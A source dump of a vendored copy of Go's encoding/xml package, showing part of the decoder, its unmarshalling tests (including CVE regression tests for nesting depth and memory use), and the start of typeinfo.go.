		if pv.CanInterface() && pv.Type().Implements(textUnmarshalerType) {
			if err := pv.Interface().(encoding.TextUnmarshaler).UnmarshalText(data); err != nil {
				return err
			}
			saveData = reflect.Value{}
		}
	}

	if err := copyValue(saveData, data); err != nil {
		return err
	}

	switch t := saveComment; t.Kind() {
	case reflect.String:
		t.SetString(string(comment))
	case reflect.Slice:
		t.Set(reflect.ValueOf(comment))
	}

	switch t := saveXML; t.Kind() {
	case reflect.String:
		t.SetString(string(saveXMLData))
	case reflect.Slice:
		if t.Type().Elem().Kind() == reflect.Uint8 {
			t.Set(reflect.ValueOf(saveXMLData))
		}
	}

	return nil
}

// copyValue stores src into dst according to dst's kind, allocating through a
// nil pointer first.
//
// For integer, unsigned, float and bool kinds an empty src sets the zero
// value. Otherwise the text is whitespace-trimmed and parsed by strconv with
// the destination's bit size, and the strconv error is returned unchanged, so
// text that does not fit the field is reported as an error. String and slice
// kinds receive the bytes as given. An invalid dst is a no-op; any other kind
// returns an error naming the original destination type.
func copyValue(dst reflect.Value, src []byte) (err error) {
	// Kept for the error message, which names the type before dereferencing.
	dst0 := dst

	if dst.Kind() == reflect.Pointer {
		if dst.IsNil() {
			dst.Set(reflect.New(dst.Type().Elem()))
		}
		dst = dst.Elem()
	}

	// Save accumulated data.
	switch dst.Kind() {
	case reflect.Invalid:
		// Probably a comment.
	default:
		return errors.New("cannot unmarshal into " + dst0.Type().String())
	case reflect.Int, reflect.Int8, reflect.Int16, reflect.Int32, reflect.Int64:
		if len(src) == 0 {
			dst.SetInt(0)
			return nil
		}
		// Base 10 only; the bit size comes from the destination type.
		itmp, err := strconv.ParseInt(strings.TrimSpace(string(src)), 10, dst.Type().Bits())
		if err != nil {
			return err
		}
		dst.SetInt(itmp)
	case reflect.Uint, reflect.Uint8, reflect.Uint16, reflect.Uint32, reflect.Uint64, reflect.Uintptr:
		if len(src) == 0 {
			dst.SetUint(0)
			return nil
		}
		utmp, err := strconv.ParseUint(strings.TrimSpace(string(src)), 10, dst.Type().Bits())
		if err != nil {
			return err
		}
		dst.SetUint(utmp)
	case reflect.Float32, reflect.Float64:
		if len(src) == 0 {
			dst.SetFloat(0)
			return nil
		}
		ftmp, err := strconv.ParseFloat(strings.TrimSpace(string(src)), dst.Type().Bits())
		if err != nil {
			return err
		}
		dst.SetFloat(ftmp)
	case reflect.Bool:
		if len(src) == 0 {
			dst.SetBool(false)
			return nil
		}
		value, err := strconv.ParseBool(strings.TrimSpace(string(src)))
		if err != nil {
			return err
		}
		dst.SetBool(value)
	case reflect.String:
		dst.SetString(string(src))
	case reflect.Slice:
		if len(src) == 0 {
			// non-nil to flag presence
			src = []byte{}
		}
		dst.SetBytes(src)
	}
	return nil
}

// unmarshalPath walks down an XML structure looking for wanted
// paths, and calls unmarshal on them.
// The consumed result tells whether XML elements have been consumed
// from the Decoder until start's matching end element, or if it's
// still untouched because start is uninteresting for sv's fields.
func (d *Decoder) unmarshalPath(tinfo *typeInfo, sv reflect.Value, parents []string, start *StartElement, depth int) (consumed bool, err error) {
	// parents is the path of element names already matched above start.
	// depth is unmarshal's nesting counter: it is forwarded unchanged to
	// nested unmarshalPath calls and incremented only when handing the
	// element to unmarshal.
	recurse := false
Loop:
	for i := range tinfo.fields {
		finfo := &tinfo.fields[i]
		// Skip fields that are not element fields, whose path is shorter
		// than the one walked so far, or that name a different name space
		// (&& binds tighter than ||).
		if finfo.flags&fElement == 0 || len(finfo.parents) < len(parents) || finfo.xmlns != "" && finfo.xmlns != start.Name.Space {
			continue
		}
		// The field's path must agree with every parent matched so far.
		for j := range parents {
			if parents[j] != finfo.parents[j] {
				continue Loop
			}
		}
		if len(finfo.parents) == len(parents) && finfo.name == start.Name.Local {
			// It's a perfect match, unmarshal the field.
			return true, d.unmarshal(finfo.value(sv, initNilPointers), start, depth+1)
		}
		if len(finfo.parents) > len(parents) && finfo.parents[len(parents)] == start.Name.Local {
			// It's a prefix for the field. Break and recurse
			// since it's not ok for one field path to be itself
			// the prefix for another field path.
			recurse = true

			// We can reuse the same slice as long as we
			// don't try to append to it.
			parents = finfo.parents[:len(parents)+1]
			break
		}
	}
	if !recurse {
		// We have no business with this element.
		return false, nil
	}
	// The element is not a perfect match for any field, but one
	// or more fields have the path to this element as a parent
	// prefix. Recurse and attempt to match these.
	for {
		var tok Token
		tok, err = d.Token()
		if err != nil {
			// The element was partly read, so it is reported as consumed.
			return true, err
		}
		switch t := tok.(type) {
		case StartElement:
			// the recursion depth of unmarshalPath is limited to the path length specified
			// by the struct field tag, so we don't increment the depth here.
			consumed2, err := d.unmarshalPath(tinfo, sv, parents, &t, depth)
			if err != nil {
				return true, err
			}
			// Children that match no field path are skipped undecoded.
			if !consumed2 {
				if err := d.Skip(); err != nil {
					return true, err
				}
			}
		case EndElement:
			// End tag of start: the prefix element is fully consumed.
			return true, nil
		}
	}
}

// Skip reads tokens until it has consumed the end element
// matching the most recent start element already consumed,
// skipping nested structures.
// It returns nil if it finds an end element matching the start // element; otherwise it returns an error describing the problem. func (d *Decoder) Skip() error { var depth int64 for { tok, err := d.Token() if err != nil { return err } switch tok.(type) { case StartElement: depth++ case EndElement: if depth == 0 { return nil } depth-- } } } ================================================ FILE: internal/thirdparty/xml/read_test.go ================================================ // Copyright 2009 The Go Authors. All rights reserved. // Use of this source code is governed by a BSD-style // license that can be found in the LICENSE file. package xml import ( "bytes" "errors" "io" "reflect" "runtime" "strings" "testing" "time" ) // Stripped down Atom feed data structures. func TestUnmarshalFeed(t *testing.T) { var f Feed if err := Unmarshal([]byte(atomFeedString), &f); err != nil { t.Fatalf("Unmarshal: %s", err) } if !reflect.DeepEqual(f, atomFeed) { t.Fatalf("have %#v\nwant %#v", f, atomFeed) } } // hget http://codereview.appspot.com/rss/mine/rsc const atomFeedString = ` Code Review - My issueshttp://codereview.appspot.com/rietveld<>rietveld: an attempt at pubsubhubbub 2009-10-04T01:35:58+00:00email-address-removedurn:md5:134d9179c41f806be79b3a5f7877d19a An attempt at adding pubsubhubbub support to Rietveld. http://code.google.com/p/pubsubhubbub http://code.google.com/p/rietveld/issues/detail?id=155 The server side of the protocol is trivial: 1. add a &lt;link rel=&quot;hub&quot; href=&quot;hub-server&quot;&gt; tag to all feeds that will be pubsubhubbubbed. 2. every time one of those feeds changes, tell the hub with a simple POST request. I have tested this by adding debug prints to a local hub server and checking that the server got the right publish requests. I can&#39;t quite get the server to work, but I think the bug is not in my code. 
I think that the server expects to be able to grab the feed and see the feed&#39;s actual URL in the link rel=&quot;self&quot;, but the default value for that drops the :port from the URL, and I cannot for the life of me figure out how to get the Atom generator deep inside django not to do that, or even where it is doing that, or even what code is running to generate the Atom feed. (I thought I knew but I added some assert False statements and it kept running!) Ignoring that particular problem, I would appreciate feedback on the right way to get the two values at the top of feeds.py marked NOTE(rsc). rietveld: correct tab handling 2009-10-03T23:02:17+00:00email-address-removedurn:md5:0a2a4f19bb815101f0ba2904aed7c35a This fixes the buggy tab rendering that can be seen at http://codereview.appspot.com/116075/diff/1/2 The fundamental problem was that the tab code was not being told what column the text began in, so it didn&#39;t know where to put the tab stops. Another problem was that some of the code assumed that string byte offsets were the same as column offsets, which is only true if there are no tabs. In the process of fixing this, I cleaned up the arguments to Fold and ExpandTabs and renamed them Break and _ExpandTabs so that I could be sure that I found all the call sites. I also wanted to verify that ExpandTabs was not being used from outside intra_region_diff.py. 
` type Feed struct { XMLName Name `xml:"http://www.w3.org/2005/Atom feed"` Title string `xml:"title"` ID string `xml:"id"` Link []Link `xml:"link"` Updated time.Time `xml:"updated,attr"` Author Person `xml:"author"` Entry []Entry `xml:"entry"` } type Entry struct { Title string `xml:"title"` ID string `xml:"id"` Link []Link `xml:"link"` Updated time.Time `xml:"updated"` Author Person `xml:"author"` Summary Text `xml:"summary"` } type Link struct { Rel string `xml:"rel,attr,omitempty"` Href string `xml:"href,attr"` } type Person struct { Name string `xml:"name"` URI string `xml:"uri"` Email string `xml:"email"` InnerXML string `xml:",innerxml"` } type Text struct { Type string `xml:"type,attr,omitempty"` Body string `xml:",chardata"` } var atomFeed = Feed{ XMLName: Name{"http://www.w3.org/2005/Atom", "feed"}, Title: "Code Review - My issues", Link: []Link{ {Rel: "alternate", Href: "http://codereview.appspot.com/"}, {Rel: "self", Href: "http://codereview.appspot.com/rss/mine/rsc"}, }, ID: "http://codereview.appspot.com/", Updated: ParseTime("2009-10-04T01:35:58+00:00"), Author: Person{ Name: "rietveld<>", InnerXML: "rietveld<>", }, Entry: []Entry{ { Title: "rietveld: an attempt at pubsubhubbub\n", Link: []Link{ {Rel: "alternate", Href: "http://codereview.appspot.com/126085"}, }, Updated: ParseTime("2009-10-04T01:35:58+00:00"), Author: Person{ Name: "email-address-removed", InnerXML: "email-address-removed", }, ID: "urn:md5:134d9179c41f806be79b3a5f7877d19a", Summary: Text{ Type: "html", Body: ` An attempt at adding pubsubhubbub support to Rietveld. http://code.google.com/p/pubsubhubbub http://code.google.com/p/rietveld/issues/detail?id=155 The server side of the protocol is trivial: 1. add a <link rel="hub" href="hub-server"> tag to all feeds that will be pubsubhubbubbed. 2. every time one of those feeds changes, tell the hub with a simple POST request. 
I have tested this by adding debug prints to a local hub server and checking that the server got the right publish requests. I can't quite get the server to work, but I think the bug is not in my code. I think that the server expects to be able to grab the feed and see the feed's actual URL in the link rel="self", but the default value for that drops the :port from the URL, and I cannot for the life of me figure out how to get the Atom generator deep inside django not to do that, or even where it is doing that, or even what code is running to generate the Atom feed. (I thought I knew but I added some assert False statements and it kept running!) Ignoring that particular problem, I would appreciate feedback on the right way to get the two values at the top of feeds.py marked NOTE(rsc). `, }, }, { Title: "rietveld: correct tab handling\n", Link: []Link{ {Rel: "alternate", Href: "http://codereview.appspot.com/124106"}, }, Updated: ParseTime("2009-10-03T23:02:17+00:00"), Author: Person{ Name: "email-address-removed", InnerXML: "email-address-removed", }, ID: "urn:md5:0a2a4f19bb815101f0ba2904aed7c35a", Summary: Text{ Type: "html", Body: ` This fixes the buggy tab rendering that can be seen at http://codereview.appspot.com/116075/diff/1/2 The fundamental problem was that the tab code was not being told what column the text began in, so it didn't know where to put the tab stops. Another problem was that some of the code assumed that string byte offsets were the same as column offsets, which is only true if there are no tabs. In the process of fixing this, I cleaned up the arguments to Fold and ExpandTabs and renamed them Break and _ExpandTabs so that I could be sure that I found all the call sites. I also wanted to verify that ExpandTabs was not being used from outside intra_region_diff.py. 
`, }, }, }, } const pathTestString = ` 1 A B C D <_> E 2 ` type PathTestItem struct { Value string } type PathTestA struct { Items []PathTestItem `xml:">Item1"` Before, After string } type PathTestB struct { Other []PathTestItem `xml:"Items>Item1"` Before, After string } type PathTestC struct { Values1 []string `xml:"Items>Item1>Value"` Values2 []string `xml:"Items>Item2>Value"` Before, After string } type PathTestSet struct { Item1 []PathTestItem } type PathTestD struct { Other PathTestSet `xml:"Items"` Before, After string } type PathTestE struct { Underline string `xml:"Items>_>Value"` Before, After string } var pathTests = []any{ &PathTestA{Items: []PathTestItem{{"A"}, {"D"}}, Before: "1", After: "2"}, &PathTestB{Other: []PathTestItem{{"A"}, {"D"}}, Before: "1", After: "2"}, &PathTestC{Values1: []string{"A", "C", "D"}, Values2: []string{"B"}, Before: "1", After: "2"}, &PathTestD{Other: PathTestSet{Item1: []PathTestItem{{"A"}, {"D"}}}, Before: "1", After: "2"}, &PathTestE{Underline: "E", Before: "1", After: "2"}, } func TestUnmarshalPaths(t *testing.T) { for _, pt := range pathTests { v := reflect.New(reflect.TypeOf(pt).Elem()).Interface() if err := Unmarshal([]byte(pathTestString), v); err != nil { t.Fatalf("Unmarshal: %s", err) } if !reflect.DeepEqual(v, pt) { t.Fatalf("have %#v\nwant %#v", v, pt) } } } type BadPathTestA struct { First string `xml:"items>item1"` Other string `xml:"items>item2"` Second string `xml:"items"` } type BadPathTestB struct { Other string `xml:"items>item2>value"` First string `xml:"items>item1"` Second string `xml:"items>item1>value"` } type BadPathTestC struct { First string Second string `xml:"First"` } type BadPathTestD struct { BadPathEmbeddedA BadPathEmbeddedB } type BadPathEmbeddedA struct { First string } type BadPathEmbeddedB struct { Second string `xml:"First"` } var badPathTests = []struct { v, e any }{ {&BadPathTestA{}, &TagPathError{reflect.TypeFor[BadPathTestA](), "First", "items>item1", "Second", "items"}}, 
{&BadPathTestB{}, &TagPathError{reflect.TypeFor[BadPathTestB](), "First", "items>item1", "Second", "items>item1>value"}}, {&BadPathTestC{}, &TagPathError{reflect.TypeFor[BadPathTestC](), "First", "", "Second", "First"}}, {&BadPathTestD{}, &TagPathError{reflect.TypeFor[BadPathTestD](), "First", "", "Second", "First"}}, } func TestUnmarshalBadPaths(t *testing.T) { for _, tt := range badPathTests { err := Unmarshal([]byte(pathTestString), tt.v) if !reflect.DeepEqual(err, tt.e) { t.Fatalf("Unmarshal with %#v didn't fail properly:\nhave %#v,\nwant %#v", tt.v, err, tt.e) } } } const OK = "OK" const withoutNameTypeData = ` ` type TestThree struct { XMLName Name `xml:"Test3"` Attr string `xml:",attr"` } func TestUnmarshalWithoutNameType(t *testing.T) { var x TestThree if err := Unmarshal([]byte(withoutNameTypeData), &x); err != nil { t.Fatalf("Unmarshal: %s", err) } if x.Attr != OK { t.Fatalf("have %v\nwant %v", x.Attr, OK) } } func TestUnmarshalAttr(t *testing.T) { type ParamVal struct { Int int `xml:"int,attr"` } type ParamPtr struct { Int *int `xml:"int,attr"` } type ParamStringPtr struct { Int *string `xml:"int,attr"` } x := []byte(``) p1 := &ParamPtr{} if err := Unmarshal(x, p1); err != nil { t.Fatalf("Unmarshal: %s", err) } if p1.Int == nil { t.Fatalf("Unmarshal failed in to *int field") } else if *p1.Int != 1 { t.Fatalf("Unmarshal with %s failed:\nhave %#v,\n want %#v", x, p1.Int, 1) } p2 := &ParamVal{} if err := Unmarshal(x, p2); err != nil { t.Fatalf("Unmarshal: %s", err) } if p2.Int != 1 { t.Fatalf("Unmarshal with %s failed:\nhave %#v,\n want %#v", x, p2.Int, 1) } p3 := &ParamStringPtr{} if err := Unmarshal(x, p3); err != nil { t.Fatalf("Unmarshal: %s", err) } if p3.Int == nil { t.Fatalf("Unmarshal failed in to *string field") } else if *p3.Int != "1" { t.Fatalf("Unmarshal with %s failed:\nhave %#v,\n want %#v", x, p3.Int, 1) } } type Tables struct { HTable string `xml:"http://www.w3.org/TR/html4/ table"` FTable string `xml:"http://www.w3schools.com/furniture 
table"` } var tables = []struct { xml string tab Tables ns string }{ { xml: `` + `hello
` + `world
` + `
`, tab: Tables{"hello", "world"}, }, { xml: `` + `world
` + `hello
` + `
`, tab: Tables{"hello", "world"}, }, { xml: `` + `world` + `hello` + ``, tab: Tables{"hello", "world"}, }, { xml: `` + `bogus
` + `
`, tab: Tables{}, }, { xml: `` + `only
` + `
`, tab: Tables{HTable: "only"}, ns: "http://www.w3.org/TR/html4/", }, { xml: `` + `only
` + `
`, tab: Tables{FTable: "only"}, ns: "http://www.w3schools.com/furniture", }, { xml: `` + `only
` + `
`, tab: Tables{}, ns: "something else entirely", }, } func TestUnmarshalNS(t *testing.T) { for i, tt := range tables { var dst Tables var err error if tt.ns != "" { d := NewDecoder(strings.NewReader(tt.xml)) d.DefaultSpace = tt.ns err = d.Decode(&dst) } else { err = Unmarshal([]byte(tt.xml), &dst) } if err != nil { t.Errorf("#%d: Unmarshal: %v", i, err) continue } want := tt.tab if dst != want { t.Errorf("#%d: dst=%+v, want %+v", i, dst, want) } } } func TestMarshalNS(t *testing.T) { dst := Tables{"hello", "world"} data, err := Marshal(&dst) if err != nil { t.Fatalf("Marshal: %v", err) } want := `hello
world
` str := string(data) if str != want { t.Errorf("have: %q\nwant: %q\n", str, want) } } type TableAttrs struct { TAttr TAttr } type TAttr struct { HTable string `xml:"http://www.w3.org/TR/html4/ table,attr"` FTable string `xml:"http://www.w3schools.com/furniture table,attr"` Lang string `xml:"http://www.w3.org/XML/1998/namespace lang,attr,omitempty"` Other1 string `xml:"http://golang.org/xml/ other,attr,omitempty"` Other2 string `xml:"http://golang.org/xmlfoo/ other,attr,omitempty"` Other3 string `xml:"http://golang.org/json/ other,attr,omitempty"` Other4 string `xml:"http://golang.org/2/json/ other,attr,omitempty"` } var tableAttrs = []struct { xml string tab TableAttrs ns string }{ { xml: ``, tab: TableAttrs{TAttr{HTable: "hello", FTable: "world"}}, }, { xml: ``, tab: TableAttrs{TAttr{HTable: "hello", FTable: "world"}}, }, { xml: ``, tab: TableAttrs{TAttr{HTable: "hello", FTable: "world"}}, }, { // Default space does not apply to attribute names. xml: ``, tab: TableAttrs{TAttr{HTable: "hello", FTable: ""}}, }, { // Default space does not apply to attribute names. xml: ``, tab: TableAttrs{TAttr{HTable: "", FTable: "world"}}, }, { xml: ``, tab: TableAttrs{}, }, { // Default space does not apply to attribute names. xml: ``, tab: TableAttrs{TAttr{HTable: "hello", FTable: ""}}, ns: "http://www.w3schools.com/furniture", }, { // Default space does not apply to attribute names. 
xml: ``, tab: TableAttrs{TAttr{HTable: "", FTable: "world"}}, ns: "http://www.w3.org/TR/html4/", }, { xml: ``, tab: TableAttrs{}, ns: "something else entirely", }, } func TestUnmarshalNSAttr(t *testing.T) { for i, tt := range tableAttrs { var dst TableAttrs var err error if tt.ns != "" { d := NewDecoder(strings.NewReader(tt.xml)) d.DefaultSpace = tt.ns err = d.Decode(&dst) } else { err = Unmarshal([]byte(tt.xml), &dst) } if err != nil { t.Errorf("#%d: Unmarshal: %v", i, err) continue } want := tt.tab if dst != want { t.Errorf("#%d: dst=%+v, want %+v", i, dst, want) } } } func TestMarshalNSAttr(t *testing.T) { src := TableAttrs{TAttr{"hello", "world", "en_US", "other1", "other2", "other3", "other4"}} data, err := Marshal(&src) if err != nil { t.Fatalf("Marshal: %v", err) } want := `` str := string(data) if str != want { t.Errorf("Marshal:\nhave: %#q\nwant: %#q\n", str, want) } var dst TableAttrs if err := Unmarshal(data, &dst); err != nil { t.Errorf("Unmarshal: %v", err) } if dst != src { t.Errorf("Unmarshal = %q, want %q", dst, src) } } type MyCharData struct { body string } func (m *MyCharData) UnmarshalXML(d *Decoder, start StartElement) error { for { t, err := d.Token() if err == io.EOF { // found end of element break } if err != nil { return err } if char, ok := t.(CharData); ok { m.body += string(char.data) } } return nil } var _ Unmarshaler = (*MyCharData)(nil) func (m *MyCharData) UnmarshalXMLAttr(attr Attr) error { panic("must not call") } type MyAttr struct { attr string } func (m *MyAttr) UnmarshalXMLAttr(attr Attr) error { m.attr = attr.Value return nil } var _ UnmarshalerAttr = (*MyAttr)(nil) type MyStruct struct { Data *MyCharData Attr *MyAttr `xml:",attr"` Data2 MyCharData Attr2 MyAttr `xml:",attr"` } func TestUnmarshaler(t *testing.T) { xml := ` hello world howdy world ` var m MyStruct if err := Unmarshal([]byte(xml), &m); err != nil { t.Fatal(err) } if m.Data == nil || m.Attr == nil || m.Data.body != "hello world" || m.Attr.attr != "attr1" || 
m.Data2.body != "howdy world" || m.Attr2.attr != "attr2" { t.Errorf("m=%#+v\n", m) } } type Pea struct { Cotelydon string } type Pod struct { Pea any `xml:"Pea"` } // https://golang.org/issue/6836 func TestUnmarshalIntoInterface(t *testing.T) { pod := new(Pod) pod.Pea = new(Pea) xml := `Green stuff` err := Unmarshal([]byte(xml), pod) if err != nil { t.Fatalf("failed to unmarshal %q: %v", xml, err) } pea, ok := pod.Pea.(*Pea) if !ok { t.Fatalf("unmarshaled into wrong type: have %T want *Pea", pod.Pea) } have, want := pea.Cotelydon, "Green stuff" if have != want { t.Errorf("failed to unmarshal into interface, have %q want %q", have, want) } } type X struct { D string `xml:",comment"` } // Issue 11112. Unmarshal must reject invalid comments. func TestMalformedComment(t *testing.T) { testData := []string{ "", "", "", "", } for i, test := range testData { data := []byte(test) v := new(X) if err := Unmarshal(data, v); err == nil { t.Errorf("%d: unmarshal should reject invalid comments", i) } } } type IXField struct { Five int `xml:"five"` NotInnerXML []string `xml:",innerxml"` } // Issue 15600. ",innerxml" on a field that can't hold it. func TestInvalidInnerXMLType(t *testing.T) { v := new(IXField) if err := Unmarshal([]byte(`5`), v); err != nil { t.Errorf("Unmarshal failed: got %v", err) } if v.Five != 5 { t.Errorf("Five = %v, want 5", v.Five) } if v.NotInnerXML != nil { t.Errorf("NotInnerXML = %v, want nil", v.NotInnerXML) } } type Child struct { G struct { I int } } type ChildToEmbed struct { X bool } type Parent struct { I int IPtr *int Is []int IPtrs []*int F float32 FPtr *float32 Fs []float32 FPtrs []*float32 B bool BPtr *bool Bs []bool BPtrs []*bool Bytes []byte BytesPtr *[]byte S string SPtr *string Ss []string SPtrs []*string MyI MyInt Child Child Children []Child ChildPtr *Child ChildToEmbed } const ( emptyXML = ` ` ) // golang.org/issues/13417 func TestUnmarshalEmptyValues(t *testing.T) { // Test first with a zero-valued dst. 
v := new(Parent) if err := Unmarshal([]byte(emptyXML), v); err != nil { t.Fatalf("zero: Unmarshal failed: got %v", err) } zBytes, zInt, zStr, zFloat, zBool := []byte{}, 0, "", float32(0), false want := &Parent{ IPtr: &zInt, Is: []int{zInt}, IPtrs: []*int{&zInt}, FPtr: &zFloat, Fs: []float32{zFloat}, FPtrs: []*float32{&zFloat}, BPtr: &zBool, Bs: []bool{zBool}, BPtrs: []*bool{&zBool}, Bytes: []byte{}, BytesPtr: &zBytes, SPtr: &zStr, Ss: []string{zStr}, SPtrs: []*string{&zStr}, Children: []Child{{}}, ChildPtr: new(Child), ChildToEmbed: ChildToEmbed{}, } if !reflect.DeepEqual(v, want) { t.Fatalf("zero: Unmarshal:\nhave: %#+v\nwant: %#+v", v, want) } // Test with a pre-populated dst. // Multiple addressable copies, as pointer-to fields will replace value during unmarshal. vBytes0, vInt0, vStr0, vFloat0, vBool0 := []byte("x"), 1, "x", float32(1), true vBytes1, vInt1, vStr1, vFloat1, vBool1 := []byte("x"), 1, "x", float32(1), true vInt2, vStr2, vFloat2, vBool2 := 1, "x", float32(1), true v = &Parent{ I: vInt0, IPtr: &vInt1, Is: []int{vInt0}, IPtrs: []*int{&vInt2}, F: vFloat0, FPtr: &vFloat1, Fs: []float32{vFloat0}, FPtrs: []*float32{&vFloat2}, B: vBool0, BPtr: &vBool1, Bs: []bool{vBool0}, BPtrs: []*bool{&vBool2}, Bytes: vBytes0, BytesPtr: &vBytes1, S: vStr0, SPtr: &vStr1, Ss: []string{vStr0}, SPtrs: []*string{&vStr2}, MyI: MyInt(vInt0), Child: Child{G: struct{ I int }{I: vInt0}}, Children: []Child{{G: struct{ I int }{I: vInt0}}}, ChildPtr: &Child{G: struct{ I int }{I: vInt0}}, ChildToEmbed: ChildToEmbed{X: vBool0}, } if err := Unmarshal([]byte(emptyXML), v); err != nil { t.Fatalf("populated: Unmarshal failed: got %v", err) } want = &Parent{ IPtr: &zInt, Is: []int{vInt0, zInt}, IPtrs: []*int{&vInt0, &zInt}, FPtr: &zFloat, Fs: []float32{vFloat0, zFloat}, FPtrs: []*float32{&vFloat0, &zFloat}, BPtr: &zBool, Bs: []bool{vBool0, zBool}, BPtrs: []*bool{&vBool0, &zBool}, Bytes: []byte{}, BytesPtr: &zBytes, SPtr: &zStr, Ss: []string{vStr0, zStr}, SPtrs: []*string{&vStr0, &zStr}, 
Child: Child{G: struct{ I int }{I: vInt0}}, // I should == zInt0? (zero value) Children: []Child{{G: struct{ I int }{I: vInt0}}, {}}, ChildPtr: &Child{G: struct{ I int }{I: vInt0}}, // I should == zInt0? (zero value) } if !reflect.DeepEqual(v, want) { t.Fatalf("populated: Unmarshal:\nhave: %#+v\nwant: %#+v", v, want) } } type WhitespaceValuesParent struct { BFalse bool BTrue bool I int INeg int I8 int8 I8Neg int8 I16 int16 I16Neg int16 I32 int32 I32Neg int32 I64 int64 I64Neg int64 UI uint UI8 uint8 UI16 uint16 UI32 uint32 UI64 uint64 F32 float32 F32Neg float32 F64 float64 F64Neg float64 } const whitespaceValuesXML = ` false true 266703 -266703 112 -112 6703 -6703 266703 -266703 266703 -266703 266703 112 6703 266703 266703 266.703 -266.703 266.703 -266.703 ` // golang.org/issues/22146 func TestUnmarshalWhitespaceValues(t *testing.T) { v := WhitespaceValuesParent{} if err := Unmarshal([]byte(whitespaceValuesXML), &v); err != nil { t.Fatalf("whitespace values: Unmarshal failed: got %v", err) } want := WhitespaceValuesParent{ BFalse: false, BTrue: true, I: 266703, INeg: -266703, I8: 112, I8Neg: -112, I16: 6703, I16Neg: -6703, I32: 266703, I32Neg: -266703, I64: 266703, I64Neg: -266703, UI: 266703, UI8: 112, UI16: 6703, UI32: 266703, UI64: 266703, F32: 266.703, F32Neg: -266.703, F64: 266.703, F64Neg: -266.703, } if v != want { t.Fatalf("whitespace values: Unmarshal:\nhave: %#+v\nwant: %#+v", v, want) } } type WhitespaceAttrsParent struct { BFalse bool `xml:",attr"` BTrue bool `xml:",attr"` I int `xml:",attr"` INeg int `xml:",attr"` I8 int8 `xml:",attr"` I8Neg int8 `xml:",attr"` I16 int16 `xml:",attr"` I16Neg int16 `xml:",attr"` I32 int32 `xml:",attr"` I32Neg int32 `xml:",attr"` I64 int64 `xml:",attr"` I64Neg int64 `xml:",attr"` UI uint `xml:",attr"` UI8 uint8 `xml:",attr"` UI16 uint16 `xml:",attr"` UI32 uint32 `xml:",attr"` UI64 uint64 `xml:",attr"` F32 float32 `xml:",attr"` F32Neg float32 `xml:",attr"` F64 float64 `xml:",attr"` F64Neg float64 `xml:",attr"` } const 
whitespaceAttrsXML = ` ` // golang.org/issues/22146 func TestUnmarshalWhitespaceAttrs(t *testing.T) { v := WhitespaceAttrsParent{} if err := Unmarshal([]byte(whitespaceAttrsXML), &v); err != nil { t.Fatalf("whitespace attrs: Unmarshal failed: got %v", err) } want := WhitespaceAttrsParent{ BFalse: false, BTrue: true, I: 266703, INeg: -266703, I8: 112, I8Neg: -112, I16: 6703, I16Neg: -6703, I32: 266703, I32Neg: -266703, I64: 266703, I64Neg: -266703, UI: 266703, UI8: 112, UI16: 6703, UI32: 266703, UI64: 266703, F32: 266.703, F32Neg: -266.703, F64: 266.703, F64Neg: -266.703, } if v != want { t.Fatalf("whitespace attrs: Unmarshal:\nhave: %#+v\nwant: %#+v", v, want) } } // golang.org/issues/53350 func TestUnmarshalIntoNil(t *testing.T) { type T struct { A int `xml:"A"` } var nilPointer *T err := Unmarshal([]byte("1"), nilPointer) if err == nil { t.Fatalf("no error in unmarshaling") } } func TestCVE202228131(t *testing.T) { type nested struct { Parent *nested `xml:",any"` } var n nested err := Unmarshal(bytes.Repeat([]byte(""), maxUnmarshalDepth+1), &n) if err == nil { t.Fatal("Unmarshal did not fail") } else if !errors.Is(err, errUnmarshalDepth) { t.Fatalf("Unmarshal unexpected error: got %q, want %q", err, errUnmarshalDepth) } } func TestCVE202230633(t *testing.T) { if testing.Short() || runtime.GOARCH == "wasm" { t.Skip("test requires significant memory") } defer func() { p := recover() if p != nil { t.Fatal("Unmarshal panicked") } }() var example struct { Things []string } Unmarshal(bytes.Repeat([]byte(""), 17_000_000), &example) } ================================================ FILE: internal/thirdparty/xml/typeinfo.go ================================================ // Copyright 2011 The Go Authors. All rights reserved. // Use of this source code is governed by a BSD-style // license that can be found in the LICENSE file. package xml import ( "fmt" "reflect" "strings" "sync" ) // typeInfo holds details for the xml representation of a type. 
type typeInfo struct {
	xmlname *fieldInfo  // info for the XMLName field; nil when none was found
	fields  []fieldInfo // every other mapped field, including ones lifted from embedded structs
}

// fieldInfo holds details for the xml representation of a single field.
type fieldInfo struct {
	idx     []int      // index path to the field, as accepted by FieldByIndex
	name    string     // XML name (last component of a ">" chain)
	xmlns   string     // namespace given in the tag, if any
	flags   fieldFlags // mode flag plus optional fOmitEmpty
	parents []string   // leading components of a ">" chain, if any
}

// fieldFlags is a bit set describing how a field is mapped to XML.
type fieldFlags int

const (
	// Mode flags: one bit per way a field can be represented.
	fElement fieldFlags = 1 << iota
	fAttr
	fCDATA
	fCharData
	fInnerXML
	fComment
	fAny

	// fOmitEmpty is a modifier, not a mode, so it is left out of fMode.
	fOmitEmpty

	// fMode masks all mode bits.
	fMode = fElement | fAttr | fCDATA | fCharData | fInnerXML | fComment | fAny

	// xmlName is the struct field name that carries the element name.
	xmlName = "XMLName"
)

var tinfoMap sync.Map // map[reflect.Type]*typeInfo

var nameType = reflect.TypeFor[Name]()

// getTypeInfo returns the typeInfo structure with details necessary
// for marshaling and unmarshaling typ.
//
// Results are cached in tinfoMap. For anything that is not a struct, and
// for the Name type itself, the returned typeInfo is empty. When two
// goroutines build the same type concurrently, LoadOrStore makes both
// return whichever value was stored first.
func getTypeInfo(typ reflect.Type) (*typeInfo, error) {
	if cached, found := tinfoMap.Load(typ); found {
		return cached.(*typeInfo), nil
	}

	built := &typeInfo{}
	if typ.Kind() == reflect.Struct && typ != nameType {
		for i, count := 0, typ.NumField(); i < count; i++ {
			field := typ.Field(i)

			// Unexported fields are skipped unless they are embedded;
			// a tag of "-" always excludes the field.
			hidden := !(field.IsExported() || field.Anonymous)
			if hidden || field.Tag.Get("xml") == "-" {
				continue
			}

			// Embedded structs (directly or through one pointer level)
			// contribute their own fields to the outer type.
			if field.Anonymous {
				embedded := field.Type
				if embedded.Kind() == reflect.Pointer {
					embedded = embedded.Elem()
				}
				if embedded.Kind() == reflect.Struct {
					inner, err := getTypeInfo(embedded)
					if err != nil {
						return nil, err
					}
					if built.xmlname == nil {
						built.xmlname = inner.xmlname
					}
					for k := range inner.fields {
						// Work on a copy so the cached inner typeInfo is
						// untouched; the index path gains the embedding
						// field's position as its first element.
						promoted := inner.fields[k]
						promoted.idx = append([]int{i}, promoted.idx...)
						if err := addFieldInfo(typ, built, &promoted); err != nil {
							return nil, err
						}
					}
					continue
				}
			}

			info, err := structFieldInfo(typ, &field)
			if err != nil {
